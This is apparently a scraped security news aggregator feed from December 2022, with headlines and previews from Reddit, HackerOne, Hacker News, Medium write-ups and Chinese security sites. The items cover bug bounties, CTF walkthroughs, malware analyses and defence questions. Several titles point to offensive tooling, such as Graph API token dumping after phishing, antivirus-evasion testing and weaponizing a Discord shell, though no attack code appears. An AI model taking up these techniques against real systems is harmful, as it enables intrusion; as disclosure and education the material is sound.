    RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass
    submitted by /u/Gallus [link] [comments]
  • Open

    SQL Injection on []
    Sony disclosed a bug submitted by splint3rsec: https://hackerone.com/reports/1213207
    DNS rebinding in --inspect via invalid octal IP address
    Node.js disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1710652
    Unauthorized access to resumes stored on LinkedIn
    LinkedIn disclosed a bug submitted by headhunter: https://hackerone.com/reports/1777095 - Bounty: $5000
  • Open

    Analytic thinking: Examining claims about Twitter spam and protests in China
    In my last blog post, I outlined a few of the qualities and skills I’ve found useful as a digital investigator who’s worked in human… Continue reading on Medium »
  • Open

    Google discovered North Korea exploiting an IE zero-day vulnerability in October
    Article URL: https://www.theverge.com/2022/12/7/23498226/google-north-korea-exploited-internet-explorer-vulnerability-security Comments URL: https://news.ycombinator.com/item?id=33896316 Points: 2 # Comments: 0
    Hackers Could Remotely Unlock and Start Cars Through SiriusXM Vulnerability
    Article URL: https://www.thedrive.com/news/hackers-could-unlock-and-start-remotely-connected-cars-through-siriusxm-vulnerability Comments URL: https://news.ycombinator.com/item?id=33889202 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-12-07 Review
    DISTDET:具有成本效益的分布式网络威胁检测系统 by ourren SEVulDet:一种语义增强的可学习漏洞检测器 by ourren ConDySTA: 上下文感知的动态辅助静态污点分析 by ourren 开源软件供应链安全系列:OSS风险点与预防 by ourren 安全概念分析框架 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-07 Review
    DISTDET:具有成本效益的分布式网络威胁检测系统 by ourren SEVulDet:一种语义增强的可学习漏洞检测器 by ourren ConDySTA: 上下文感知的动态辅助静态污点分析 by ourren 开源软件供应链安全系列:OSS风险点与预防 by ourren 安全概念分析框架 by ourren 更多最新文章,请访问SecWiki
  • Open

    Is Information Technology with a concentration in Cyber Security a good start if I'm looking into digital forensics?
    I also added intro to criminal justice on my first semester classes but not sure how they'll cross over or anything, but figured it would be useful submitted by /u/believeinGod_ [link] [comments]
    Linux Forensics - Talks and Workshops
    submitted by /u/boutnaru [link] [comments]
    How can I get airdrop logs off an iPhone?
    Buddies kid airdropped his whole school during an assembly and was suspended. But everyone’s saying it’s a different kid that did it but the school needs proof. Any easy to pull logs off of an iPhone for that? submitted by /u/Fission455 [link] [comments]
  • Open

    TryHackMe | Advent of Cyber Part 1
    Hi there! In this article, as we approach the end of 2022, we’ll review and solve the “Advent of Cyber 2022” room in TryHackMe together. Continue reading on Medium »
    TryHackMe | Advent of Cyber Part 1
    Hi there! In this article, as we approach the end of 2022, we’ll review and solve the “Advent of Cyber 2022” room in TryHackMe together. Continue reading on Medium »
  • Open

    Java安全详解反序列化漏洞的成因和fastjson实际漏洞分析
    FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式。
    FreeBuf早报 | Z世代互联网用户使网络犯罪“正常化”;三星某旗舰机一天被入侵两次
    参赛者在 Pwn2Own 多伦多 2022 年黑客竞赛的第一天两次入侵三星 Galaxy S2022 智能手机,利用零日漏洞进行输入验证攻击。
    AI将取代人类?机器人ChatGPT能测漏洞、审代码还能修bug
    OpenAI研究实验室推出了聊天机器人ChatGPT,一跃成为人工智能领域的“当红炸子鸡”。网安人害怕吗?
    Java 利用PriorityQueue进行无InvokerTransformer反序列化
    java.util.PriorityQueue是一个优先队列(Queue),节点之间按照优先级大小排序成一棵树。其中PriorityQueue有自己的readObject反序列化入口。
    网络安全架构之安全概况
    本文作者:zhh前言网络安全架构图是按照现有网络安全需求整理,通过多个维度展现。本文章主要介绍关于网络安全的整体概况,关于每个维度的详细介绍后期会持续更新,敬请关注!国家网络空间安全战略信息技术广泛应用和网络空间兴起,极大促进了经济社会繁荣进步,同时也带来了新的安全风险和挑战。重大机遇伴随信息革命的飞速发展,互联网、通信网、计算机系统、自动化控制系统、数字设备及其承载的应用、服务和数据等组成的网络
    “乌克兰IT军”关闭了俄罗斯第二大银行
    这不仅是今年记录到的最大规模的网络攻击,也是该银行整个历史上最大的网络攻击。
  • Open

    How did you go about developing a comprehensive security framework for your organization in order to meet SOC 2 requirements?
    Curious to hear what everyone has to say! submitted by /u/Thecomplianceexpert [link] [comments]
    Detection Certifications
    I currently work as a SOC analyst but have gained an interest in the detection side of our workflow. I was wondering if there are any detection related certifications that are reasonably priced? Only one I can find is GIAC Certified Detection Analyst, however these certs can cost 3k plus to take submitted by /u/DoubleAgent10 [link] [comments]
    SSRF protection in Java / Spring
    Trying to protect against SSRF in a Java / Spring web application. We want to be able to offer customers the ability to enter in a webhook URL. So we can't easily allowlist what domains / URLs they can/can't use. The only way forward I see, is a piece of functionality that resolves every DNS record and checks if it's a private IP address, localhost, link local, etc. Is there a pre-existing library / function we can use for this? Or is there another way? submitted by /u/Soggy_Bag_8745 [link] [comments]
  • Open

    Bypass Microsoft Graph API paging limitation
    Bypass Microsoft Graph API paging limitation and dump all user's objects using Graph API token (Illicit Grant Phishing Attack). The graphAPIDump script iterates through the u/odata.nextLink property in the result response to retrieve all the users objects. https://github.com/lutzenfried/OffensiveCloud/blob/4de3846faffa13d813872ffae6b990fa670dae6e/Azure/Tools/graphAPIDump.py submitted by /u/lutzenfried [link] [comments]

  • Open

    DOS protection via modsec
    Hi, I'm curious if anyone here has resources or maybe a link for a good how to specific to DOS mitigation using modsec. I have modsec + ngnix up and functional and the core rule sets include ddos protection via REQUEST-912-DOS-PROTECTION, but what Im struggling with is figuring out how to define thresholds. E.g how in the world do we rate limit connections from xyz to 1K / sec and if exceeded block? submitted by /u/elsewhere1 [link] [comments]
    Proxy server worth it?
    I have a small homelab where I host game servers, some plex with external access, and potentially a calibre library. I've been doing this for a couple years and recently moved and upgraded my setup. Originally I had an ISP modem & router (separate at least) that just fed into a managed switch and I had my daily driver desktop and an esxi installation. I ran snort with a sys log, but not in-line, just to keep track of anything hitting the ESXi server. I never had any issues. I now feel better after moving - fiber network with way higher up/down, and basically some VLANs with a dedicated inline pfSENSE at the front of it, with snort (thinking about suricata) and pfBlocker. I'm using vcenter with a cluster, but doing all the same type of stuff - hosting servers and media for friends. Someone recently asked me why I don't use a proxy for hiding my IP address and I realized I just never thought about it all that much. I understand there's always inherent risk exposing yourself to the web but in my mind, obscuring my IP address at the cost of increased latency/potentially decreased network performance and having minor cloud infrastructure to manage (and pay for) just doesn't seem worth it. But, it's also possible I'm very stupid. Am I being stupid? submitted by /u/Hollowpoint357 [link] [comments]
    Free Live Webinar - TLS 1.3 and how it differs from prior versions of TLS/SSL - 12/15/2022 @ 2:30p PST 5:30p EST
    A few days ago, I asked this subreddit if there was interest in a free live webinar discussing TLS 1.3 and how it differs from previous versions of SSL/TLS. The response was overwhelmingly positive, so I'm offering the webinar Thursday 12/15/2022 at 2:30p PST / 5:30p EST. TLS 1.3 and how it differs from previous versions of SSL and TLS Thursday :: 12/15/2022 :: 02:30p PST / 05:30p EST Duration: 2 hours Agenda: 60-75~ minutes of lecture, with 3 breaks for Q&A followed by free for all Q&A on anything TLS/SSL related for the remainder of the session.   Topics I plan to cover: Old protocols no longer supported Simpler Cipher Suites Fewer Cipher Suites All TLS 1.3 Ciphers are AEAD Forward Secrecy Removed Custom DH Groups Shorter Handshake (One Round Trip) Most of the Handshake is Encrypted Client Certificate is Encrypted Many, Many more Session Keys Middleboxes - what they are, how they inhibited smooth TLS 1.3 transition For each topic I plan to describe how a feature worked in TLS 1.2 and prior, how it was broken, and how TLS 1.3 improved it. If you're apprehensive about registering and providing your email address, no worries, I understand. This link should take you directly to the watch page (a zoom invite link will pop up when the countdown expires). Q: Will the session be recorded? Yes. It will be recorded and made available to those who register. If you want the replay you'll have to register. Q: Will there be more sessions? Sure. I'll do more, and on other topics, if the subredddit wants and as long as it doesn't violate any subreddit policies. I asked the mods specifically about this one and got no response... went ahead scheduled hoping the positive reception in the initial request was enough for at least this session. submitted by /u/erh_ [link] [comments]
    Anyone use Qualys?
    I've been using Qualys a little over a year now. I've found it to be extremely unreliable and their support about McAfee level of horror. We renewed assuming the worst was behind us recently and shut us down for 3 weeks now after processing our renewal due to some platform bugs. Last year was about 3-4 weeks of lost service as well. Curious if were alone or if others are having problems? submitted by /u/Cheatyhax [link] [comments]
    Setup MacOS Mojave in Hp Pavilion
    Any trusted site from where i can download MacOS ..? submitted by /u/Few_Grapefruit6628 [link] [comments]
    What do pen testers study?
    Pen testers of reddit, when you guys aren't working what do y'all study? Also how do you guys study, and keep up with your work? submitted by /u/AlternativeNo5023 [link] [comments]
    Steghide Linux Steganography how to get "Passphrase"
    Hello all, I am currently on Parrot Linux and have an image has a hidden steganographic inside. I know I need to decode it with Steghide in the Parrot Terminal. I also know that I will find out what the hidden steganographic data (that with be extracted to a .txt file) with the command: "steghide extract -sf IMAGE.jpg -p PASSPHRASE". The question is, using a command that steghide provides... how would I get the PASSPHRASE to find the hidden message within the image jpg? Oh also, I know the seed is "Found (possible) seed: "b40d0b29" - now I am not sure what that means and if that can assist me in anyway, but I thought I'd drop that here just in case. Thanks all! submitted by /u/PrimeHuntOfficial [link] [comments]
    What are the key netsec industry publications and reports everyone should read?
    See above. Thanks! submitted by /u/NiceHolidayNot [link] [comments]
  • Open

    Pickle Rick -THM
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 6] It’s beginning to look a lot like phishing — No Answers :P
    No content preview
    TryHackMe writeup: Bounty Hacker
    In this room, I join forces with Faye Valentine et al to get a bunch of internet terrorists with FTP and privilege escalation hacks! Continue reading on InfoSec Write-ups »
    Reflected XSS using Double Encoding
    No content preview
    Intercepting HTTP traffic with OpenVPN on Android
    No content preview
    HTB Time [writeup]
    Exploiting the RCE and SSRF Vulnerabilities Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 5] He knows when you’re awake — No Answers :P
    No content preview
    How to Hack Applications’ Logic
    No content preview
    [WRITE-UP] ATO bug in a target who wasn’t running any bug bounty program (Bounty: 40K INR)
    No content preview
    HTB University CTF 2022 — Cloud — Enchanted
    No content preview
  • Open

    Pickle Rick -THM
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 6] It’s beginning to look a lot like phishing — No Answers :P
    No content preview
    TryHackMe writeup: Bounty Hacker
    In this room, I join forces with Faye Valentine et al to get a bunch of internet terrorists with FTP and privilege escalation hacks! Continue reading on InfoSec Write-ups »
    Reflected XSS using Double Encoding
    No content preview
    Intercepting HTTP traffic with OpenVPN on Android
    No content preview
    HTB Time [writeup]
    Exploiting the RCE and SSRF Vulnerabilities Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 5] He knows when you’re awake — No Answers :P
    No content preview
    How to Hack Applications’ Logic
    No content preview
    [WRITE-UP] ATO bug in a target who wasn’t running any bug bounty program (Bounty: 40K INR)
    No content preview
    HTB University CTF 2022 — Cloud — Enchanted
    No content preview
  • Open

    Pickle Rick -THM
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 6] It’s beginning to look a lot like phishing — No Answers :P
    No content preview
    TryHackMe writeup: Bounty Hacker
    In this room, I join forces with Faye Valentine et al to get a bunch of internet terrorists with FTP and privilege escalation hacks! Continue reading on InfoSec Write-ups »
    Reflected XSS using Double Encoding
    No content preview
    Intercepting HTTP traffic with OpenVPN on Android
    No content preview
    HTB Time [writeup]
    Exploiting the RCE and SSRF Vulnerabilities Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 5] He knows when you’re awake — No Answers :P
    No content preview
    How to Hack Applications’ Logic
    No content preview
    [WRITE-UP] ATO bug in a target who wasn’t running any bug bounty program (Bounty: 40K INR)
    No content preview
    HTB University CTF 2022 — Cloud — Enchanted
    No content preview
  • Open

    An open source SMS gateway for pentest projects
    submitted by /u/aunga [link] [comments]
    The Last Breath of Our Netgear RAX30 Bugs - A Tragic Tale before Pwn2Own Toronto 2022
    submitted by /u/Gallus [link] [comments]
    Moobot Uses a Fake Vulnerability
    submitted by /u/chicksdigthelongrun [link] [comments]
  • Open

    Ability to change permissions across seller platform
    TikTok disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1783001 - Bounty: $5000
    Unprotected Atlantis Server at https://152.70..
    8x8 disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1793526
    XSS in linktr.ee - on link thumbnail adding
    Linktree disclosed a bug submitted by jagata: https://hackerone.com/reports/1775162 - Bounty: $600
  • Open

    The Activist Rot: How Harvard is fast becoming the leading purveyor of disinformation online
    It reads like the script for a straight-to-streaming low-budget thriller. Continue reading on Dialogue & Discourse »
    Advent of Cyber 4 (2022): Day 3 Write-up
    It’s time to do some OSINT! Welcome to Day 3 of Advent of Cyber 4 (2022) write-up. To check the room, click here. Continue reading on System Weakness »
    Google mail Hacking — Ghunt V2 (Gmail OSINT)
    I have already covered Gmail OSINT in one of my previous article, and with help of you guys, it’s one of my top articles. But today, we… Continue reading on System Weakness »
  • Open

    Yüksek Riskli Powershell Komutları
    Invoke-NinjaCopy Continue reading on Medium »
    Google mail Hacking — Ghunt V2 (Gmail OSINT)
    I have already covered Gmail OSINT in one of my previous article, and with help of you guys, it’s one of my top articles. But today, we… Continue reading on System Weakness »
    HTB University CTF 2022 — Cloud — Enchanted
    Hack The Box University CTF is a great CTF for university and college students all around the world. The challenges represent a real world… Continue reading on InfoSec Write-ups »
  • Open

    Account takeover without user interaction on sign with Facebook flow
    Night Hunter is not a one-person night hunter is everyone who chose to hack for a reason, night hunters always thirsty for more and more… Continue reading on Medium »
    Bug Hunting 101 — Credential Stuffing Vulnerabilities
    TL;DR- Credential stuffing can be exploited for high-level bug bounties, and can pose dangerous potential exploits. Continue reading on The Gray Area »
    Some of the best cybersecurity youtube channels
    Here are some of the best cybersecurity youtube channels that I am aware of: Continue reading on Medium »
    Using Recon-Ng for Recon for Bug Bounty
    Recon-Ng is a great tool for automating your recon workflow and is one of the must have tool for Bug bounties. Continue reading on Medium »
    How we breached ZDFheute live on television
    In summer this year, we came across some security misconfiguration in Germany’s biggest — and one of Europe’s largest — Television… Continue reading on Medium »
    Leaking STRIPE Live Key leading to information disclosure:: Bounty: $1000
    Hey Hunters, Continue reading on Medium »
    How I Found and Exploit Google Maps API Key
    Hey Everyone, Continue reading on Medium »
  • Open

    DEV-0139 launches targeted attacks against the cryptocurrency industry
    submitted by /u/SCI_Rusher [link] [comments]
    Linux PrivEsc(2) — Abusing Scheduled Tasks (cron)
    submitted by /u/Clement_Tino [link] [comments]
  • Open

    Hoarder is a script made to collect and parse the most valuable artifacts for forensics or incident response investigations rather than imaging the whole hard drive
    submitted by /u/boutnaru [link] [comments]
  • Open

    SecWiki News 2022-12-06 Review
    从Deserialization和覆盖trustURLCodebase进行JNDI注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-06 Review
    从Deserialization和覆盖trustURLCodebase进行JNDI注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Zero Day Initiative — Pwn2Own Toronto 2022 - The Schedule
    submitted by /u/soupcreamychicken [link] [comments]
    Exploit Education's Phoenix Stack Three Challenge Writeup
    Hi everyone, I have just released the writeup for Exploit Education's Phoenix Stack Three challenge. Any reactions & feedback would be most welcome. Thanks in advance! https://medium.com/bugbountywriteup/phoenix-challenges-stack-three-984e0434356b submitted by /u/ProgrammingBro123 [link] [comments]
  • Open

    Moobot Uses a Fake Vulnerability
    Article URL: https://vulncheck.com/blog/moobot-uses-fake-vulnerability Comments URL: https://news.ycombinator.com/item?id=33880471 Points: 1 # Comments: 0
  • Open

    More Active Directory for Script Kiddies
    Introduction So… Active Directory is amazing. It tells me everything I want to know—a regular Ask Jeeves for the whole domain—but I’m sure there is more that it can do. What else am I missing? In a previous article, I described the Active Directory (AD) service and how a Script Kiddie might use it to... The post More Active Directory for Script Kiddies appeared first on TrustedSec.
  • Open

    如何使用pycrypt加密工具测试反病毒产品的检测性能
    广大研究人员可以使用pycrypt来尝试绕过任意类型的反病毒产品,以检测目标反病毒产品的安全性能。
    FreeBuf早报 | 因窃取两千万美元,攻击者被判18个月;因勒索软件攻医院取消手术
    全球动态1.高危 AMI MegaRAC 漏洞影响 AMD、ARM、HPE、Dell 等众多服务器Eclypsium 的研究人员发现美国 Megatrends  MegaRAC 基板管理控制器(BMC)软件中存在三个漏洞,这些漏洞影响许多云服务和数据中心运营商使用的服务器设备。【外刊-阅读原文】2.CISA督促谷歌12月26日前修补 Chrome 漏洞网络安全和基础设施安全局 (CISA) 在其已
    微软提醒欧洲:这个冬天做好与俄罗斯网络战的准备
    俄罗斯可能瞄准供应链攻击并推动影响力运营
    CCSIP2022中国网络安全行业全景册(第五版)调研启动
    申报时间:即日起—12月27日。
    高危 AMI MegaRAC 漏洞影响 AMD、ARM、HPE、Dell 等众多服务器
    Eclypsium的研究人员发现美国 Megatrends  MegaRAC基板管理控制器(BMC)软件中存在三个漏洞。
    议题抢先看 | CIS 2022网安多维时空直播间见
    12月14日一起云入席、云参会、云交流。
  • Open

    The Ultimate Smart Contract Test
    Smart contracts are merely computer programs running on a blockchain, and we all know that computer programs are almost never without bugs… Continue reading on Medium »
  • Open

    The Ultimate Smart Contract Test
    Smart contracts are merely computer programs running on a blockchain, and we all know that computer programs are almost never without bugs… Continue reading on Medium »
  • Open

    OSS-Fuzz – continuous fuzzing for open source software
    Article URL: https://github.com/google/oss-fuzz Comments URL: https://news.ycombinator.com/item?id=33878128 Points: 3 # Comments: 1
  • Open

    Vice Society: Profiling a Persistent Threat to the Education Sector
    Vice Society, a ransomware gang, has been involved in high-profile activity against schools this year. The post Vice Society: Profiling a Persistent Threat to the Education Sector appeared first on Unit 42.

  • Open

    Windows security updates classified by CVE
    Article URL: https://msrc.microsoft.com/update-guide Comments URL: https://news.ycombinator.com/item?id=33873712 Points: 1 # Comments: 0
    CVE-2022-4170: rxvt-unicode code execution via background OSC
    Article URL: https://www.openwall.com/lists/oss-security/2022/12/05/1 Comments URL: https://news.ycombinator.com/item?id=33871617 Points: 1 # Comments: 0
  • Open

    TryHackMe | Advent of Cyber 22 | Day 3 OSINT Walkthrough
    Nothing escapes detective McRed Continue reading on The Sleuth Sheet »
    Smoke Signals: Creating a Virtual Burner Phone
    A guide on creating a cost effective and quickly disposable VoIP phone that is hidden within a secondary user on Android devices. Continue reading on Medium »
    SNMP- Simple Network Management Protocol (Information Gathering)
    SNMP stands for Simple Network Management Protocol. Continue reading on System Weakness »
    - ANALYSE DU CRYPTO FR. — V1-
    Grâce à une cartographie, nous allons comprendre comment fonctionne les interactions au sein du Crypto Twitter FR. Continue reading on Medium »
    Open Source Intelligence (OSINT)
    Open-Source Intelligence, or OSINT, is a valuable tool for organizations and individuals seeking to improve their cyber security posture… Continue reading on Medium »
    Advent of Cyber 2022 TryHackMe
    Day 2 Continue reading on Medium »
  • Open

    I believe I may have a rat, is it possible to use wire shark to figure out the application it's coming from and how to remove it?
    I've already done a factory reset that didn't remove personal files as I don't have a method of backup and I have far too many. However I'm worried it might be a rootkit, or it could be I accidentally plugged in a usb drive from a few days before the reset that the rat could have infected without my knowledge. If I could get some direct help to verify if there is/is not a rat I'd appreciate it submitted by /u/CrossOnDiscord [link] [comments]
    sslscan
    I started playing around with the Kali box I created on Friday. I have been able to get this to work on our firewall and switch but I cannot get this to run a scan on the desktops or servers. Could someone help me out? submitted by /u/MrMack33 [link] [comments]
    Would there be interest in a live webinar going through the major differences in TLS 1.3? (is that even in line with this Subs rules?)
    Hi all, TLS 1.3 is a large departure from the TLS versions before it. Would there be interest in a live teaching session (via Zoom; and free, of course) later this week where I run through some of those differences? Mods, is that acceptable for the sub? I don't want to violate any rules =) As a teaser, here would be the differences I would talk through: Old protocols no longer supported Simpler Cipher Suites Fewer Cipher Suites All TLS 1.3 Ciphers are AEAD Forward Secrecy Removed Custom DH Groups Shorter Handshake (One Round Trip) Most of the Handshake is Encrypted Client Certificate is Encrypted Many, Many more Session Keys TLS 1.2- Renegotiation is gone Replaced with Key Update & Post Handshake Authentication Session Tickets no longer risk original session Session Tickets protected by TLS session Session Resumption & PSK mode combined Adds option for additional DH Exchange Adds option for Early Data / 0RTT When I've done this before (for the sake of time) I've skipped the last few differences and instead talked about Middleboxes and how they hindered upgrading to TLS 1.3, and the things TLS 1.3 did to "get through" misbehaving middleboxes. submitted by /u/erh_ [link] [comments]
    Pre Law to Cyber Security
    Hi All! I am currently a pre-law senior due to graduate in the spring but I have some hesitation about going through with this degree. Cybersecurity has intrigued me for a while but my school does not have a bachelors program, but they do offer a masters program that I was interested in applying too. My question for you alll was how can I get into this field, should I get my bachelors in it, or finish off my degree in an unrelated field and go for my masters in this field, whilst looking for internships submitted by /u/Trevor14NYK [link] [comments]
    WFH ACTIVITY
    Any reports of WFH assets being utilized to DDOS or scan home networks? submitted by /u/N3Y3G0 [link] [comments]
  • Open

    [Help] I'm looking for a downloadable list of all CVEs including vulnerability
    submitted by /u/much_thanks [link] [comments]
    Default NETGEAR Router Configuration Allows Attacks from WAN
    submitted by /u/dinobyt3s [link] [comments]
    Hijacking GitHub Repositories by Deleting and Restoring Them
    submitted by /u/whisperingmime [link] [comments]
    A Detailed Analysis of The Last Version of REvil Ransomware [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    Release of EMBA firmware analyzer in version 1.2.0 - aka London Calling
    submitted by /u/_m-1-k-3_ [link] [comments]
    Slides: Demystifying Practical DoS Attacks
    submitted by /u/mazen160 [link] [comments]
    “In startups, your junior dev is more of a threat to security than North Korea.” Appreciate a security expert who knows startups shouldn't waste resources overdoing security when they still don't have product-market fit.
    submitted by /u/maddening_conversati [link] [comments]
  • Open

    Coming across C++ BOF (Buffer Overflow) Vulnerabilities Within Libraries (part 2) EXTENSION
    Extension of me exploring a vulnerability and bug found in a C++ library for packet capturing and layer parsing. Continue reading on Medium »
    How to Hack Applications’ Logic
    Hi everyone, I decided to write a guide about finding logical bugs on applications like the web, mobile, and desktop. Actually, this… Continue reading on InfoSec Write-ups »
    Responsible Disclosure — Reflections on the Past 20 years
    It’s hard to believe that over 20 years have passed since Steve Christey and Chris Wysopol published the first substantive call for an… Continue reading on DayBlink Consulting »
    OTP Leaking Through Cookie Leads to Account Takeover
    OTP Bypass Continue reading on Medium »
    [BAC/IDOR] How my father credit card help me to find this access control issue
    بِسْمِ ٱللَّٰهِ ٱلرَّحْمَٰنِ ٱلرَّحِيمِ Continue reading on Medium »
    The Top 8 Cybersecurity Resources for Professionals In 2022
    TL;DR — Some of the best websites and official resources to learn more about industry standards, job requirements, and pen-testing tips. Continue reading on The Gray Area »
  • Open

    IPED Digital Forensic Tool. It is an open source software that can be used to process and analyze digital evidence, often seized at crime scenes by law enforcement or in a corporate investigation by private examiners.
    submitted by /u/boutnaru [link] [comments]
  • Open

    SecWiki News 2022-12-05 Review
    SecWiki周刊(第457期) by ourren S&P'22:探测并抵御CI服务中的非法加密挖矿 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-05 Review
    SecWiki周刊(第457期) by ourren S&P'22:探测并抵御CI服务中的非法加密挖矿 by ourren 更多最新文章,请访问SecWiki
  • Open

    IDOR in Stats API Endpoint Allows Viewing Equity or Net Profit of Any MT Account
    EXNESS disclosed a bug submitted by ashwarya: https://hackerone.com/reports/1644436 - Bounty: $1000
  • Open

    How I Found My First XSS via File upload
    Hey Everyone, Continue reading on Medium »
  • Open

    FreeBuf早报 | 匈牙利政府向公民发送政治垃圾邮件;安卓Messages群聊将支持端对端加密
    Google 宣布其 Android 消息应用 Messages 未来几周开始公测群聊端对端加密功能。
    俄罗斯多地政厅和法院遭网络攻击,不排除地缘政治的原因
    该新型攻击可以消除所有格式的文件内容,但负责系统本身运行的文件除外。其主要目标包括数据库和档案。
    SaaS的阴暗面:网络攻击武器化、平民化
    不懂编程,甚至简单的“一键操作”,就能对目标输出成吨伤害。
    APP漏洞挖掘(二)同开发商的多款APP存在通用漏洞
    测某一APP时,根据信息收集+测试,发现APP的后台系统存在SQL注入、XSS、弱口令、信息泄漏等漏洞。
    一文学会DNS隧道搭建
    一文学会搭建dns隧道
    三菱电机 PLC 曝出多个严重安全漏洞
    美国网络安全和基础设施安全局在上周发布了一份工业控制系统咨询,对三菱电机 GX Works3 工程软件存在的多个漏洞发出了安全警告。
    IBM 云数据库 PostgreSQL 出现安全漏洞
    IBM修复一个影响其 PostgreSQL 云数据库产品的高严重性安全漏洞,该漏洞可能被利用来篡改内部存储库并运行未经授权的代码。
    小心!这些安装了 200 万次的 Android 键盘应用程序可以被远程入侵
    这些应用程序被广泛使用,但它们既没有考虑到用户的隐私安全也没有进行任何迭代,显然,在开发这些应用程序时,安全性并不在他们的设计范围内。
  • Open

    Set up Cloud Instances
    AWS Continue reading on InfoSec Write-ups »
    My first experience in hosting a National Level Capture The Flag Competition
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 2] — No Answers :P
    Day 2 Learning Objectives Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 3] — No Answers :P
    Day 3 Learning Objectives: Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 4] Scanning through the snow— No Answers :P
    Day 4 Learning Objectives Continue reading on InfoSec Write-ups »
    Phoenix Challenges — Stack Three
    No content preview
    Anti-Reversing Techniques (Part 2)
    No content preview
    ‍IW Weekly #36: 1,250€ Bounty, VoIP Spoofing, SSL Pinning, Intercepting Proxy, XSS Resources…
    No content preview
    Learn From 16 Experts at IWCON2022 Cybersecurity Conference
    No content preview
  • Open

    Set up Cloud Instances
    AWS Continue reading on InfoSec Write-ups »
    My first experience in hosting a National Level Capture The Flag Competition
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 2] — No Answers :P
    Day 2 Learning Objectives Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 3] — No Answers :P
    Day 3 Learning Objectives: Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 4] Scanning through the snow— No Answers :P
    Day 4 Learning Objectives Continue reading on InfoSec Write-ups »
    Phoenix Challenges — Stack Three
    No content preview
    Anti-Reversing Techniques (Part 2)
    No content preview
    ‍IW Weekly #36: 1,250€ Bounty, VoIP Spoofing, SSL Pinning, Intercepting Proxy, XSS Resources…
    No content preview
    Learn From 16 Experts at IWCON2022 Cybersecurity Conference
    No content preview
  • Open

    Set up Cloud Instances
    AWS Continue reading on InfoSec Write-ups »
    My first experience in hosting a National Level Capture The Flag Competition
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 2] — No Answers :P
    Day 2 Learning Objectives Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 3] — No Answers :P
    Day 3 Learning Objectives: Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 4] Scanning through the snow— No Answers :P
    Day 4 Learning Objectives Continue reading on InfoSec Write-ups »
    Phoenix Challenges — Stack Three
    No content preview
    Anti-Reversing Techniques (Part 2)
    No content preview
    ‍IW Weekly #36: 1,250€ Bounty, VoIP Spoofing, SSL Pinning, Intercepting Proxy, XSS Resources…
    No content preview
    Learn From 16 Experts at IWCON2022 Cybersecurity Conference
    No content preview
  • Open

    DuckLogs 恶意软件在野外执行多种恶意活动
    作者:CybleBlogs 译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/12/01/ducklogs-new-malware-strain-spotted-in-the-wild/ 恶意软件即服务为黑客提供复杂的功能 Cyble研究和情报实验室(CRIL)一直在持续监控在野外新出现的活跃恶意软件家族。最近,CRIL观察到一种名为Duck...
  • Open

    DuckLogs 恶意软件在野外执行多种恶意活动
    作者:CybleBlogs 译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/12/01/ducklogs-new-malware-strain-spotted-in-the-wild/ 恶意软件即服务为黑客提供复杂的功能 Cyble研究和情报实验室(CRIL)一直在持续监控在野外新出现的活跃恶意软件家族。最近,CRIL观察到一种名为Duck...

  • Open

    TryHackMe Advent of Cyber 2022 [Day 3] — No Answers :P
    Day 3 Learning Objectives: Continue reading on InfoSec Write-ups »
    Exploring whether NASA FIRMS can accurately be used for open-source intelligence activities
    NASA Fire Information for Resource Management System (NASA FIRMS) satellites have been around for more than a decade and have been adopted… Continue reading on Medium »
    Advent of Cyber — Day 3 — Nothing escapes detective McRed
    Link to room: https://tryhackme.com/room/adventofcyber Continue reading on Medium »
    Challenge pierre précieuse
    Correction du challenge proposé sur twitter le 18 novembre 2022. Continue reading on Medium »
    SPY NEWS: 2022 — Week 48
    Summary of the espionage-related news stories for the Week 48 (27 November-3 December) of 2022. Continue reading on Medium »
    OSINT Challenge- 1
    This is a Quiztime OSINT challenge for a post at November 28: Continue reading on Medium »
    TryHackMe: [Day 3] [OSINT] Advent of Cyber 2022: Nothing escapes detective McRed Walkthrough
    Day 3 — Advent of Cyber 2022: Nothing escapes detective McRed: Continue reading on Medium »
    Advent of Cyber 2022 — [Day 3] OSINT Nothing escapes detective McRed Q&A
    Q: What is the name of the Registrar for the domain santagift.shop? Continue reading on Medium »
    TryHackMe Advent of Cyber 4→ DAY 3— Nothing escapes detective McRed
    As the elves are trying to recover the compromised santagift.shop website, elf Recon McRed is trying to figure out how it was compromised… Continue reading on rootissh »
  • Open

    Vulnerability and fraud: evidence from the Covid-19 pandemic
    Article URL: https://www.nature.com/articles/s41599-022-01445-5 Comments URL: https://news.ycombinator.com/item?id=33858542 Points: 1 # Comments: 0
  • Open

    Failure[INSTALL_PARSE_FAILED_NO_CERTIFICATES]
    Recentemente, voltei meus estudos de segurança da informação para aplicativos mobiles, e logo de início, quando fui iniciar os testes com… Continue reading on Medium »
    Weaponizing Discord Shell via SMB
